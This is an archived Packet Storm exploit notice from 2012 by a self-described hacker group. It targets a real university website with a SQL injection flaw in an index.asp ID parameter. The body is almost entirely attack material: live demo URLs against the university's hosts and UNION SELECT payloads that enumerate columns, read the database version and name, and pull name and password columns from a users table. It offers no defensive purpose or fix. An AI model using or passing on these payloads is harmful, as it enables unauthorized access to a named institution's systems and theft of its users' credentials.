Zanjan Azad University SQL Injection

2012-02-05T00:00:00
ID PACKETSTORM:109444
Type packetstorm
Reporter Skote Vahshat
Modified 2012-02-05T00:00:00

Description

                                        
                                            `|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
|* ______ ____ __ __ |  
|* /\__ _\/\ _`\ /\ \/\ \ |  
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |  
|* \ \ \ \ \ _ <'\ \ _ \ |  
|* \ \ \ \ \ \L\ \\ \ \ \ \ |  
|* \ \_\ \ \____/ \ \_\ \_\ |  
|* \/_/ \/___/ \/_/\/_/ |  
|* |  
|* Skote_vahshat and bl4ck.viper |  
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
=========================================================================  
\* [Title] :[Zanjan Azad University injection vulnerability] /*  
\* [Author] :[skote_vahshat] /*  
\* [Home] :[Http://turk-bh.ir] /*  
\* [Email] :[skote.vahshat@Gmail.Com] /*  
==========================================================================  
/*  
/*  
/*  
/* Web Server: [ Microsoft-IIS/6.0 ]  
/* DB Server: [ MSAccess ]  
/*  
/* ===================================================================  
/* [+]Exploit :  
/* http://www.target.com/pages/index.asp?ID=[SQLi}  
/*  
/* [+] (target )  
/* [.] (Demo )  
/* http://www2.azu.ac.ir/pages/index.asp?ID=-142[sqli]  
/* http://ns1.azu.ac.ir/pages/index.asp?ID=142+union+select+1,name,3,4,5,6,7+from+users  
/* [+]  
  
/* [+]inject:  
/* +union+select+1,2,3,4,5,6,7 =>> column 2  
/* union+select+1,@@version,3,4,5,6,7  
/* union+select+1,database(),3,4,5,6,7  
/*  
/* [+] (table) =>> users  
/*  
/* union+select+1,2,3,4,5,6,7from+users  
/*  
/*  
/* [+] column ( name # password )  
/*  
/  
===================================================================================  
|_***_|thanks: bl4ck.viper , dr.tofan , hellboy , netqurd , turk_server kingcope |  
|_***_| spical thnaks :all tbh member ,iraniyan hacker all turkiS hackers |  
===================================================================================  
  
`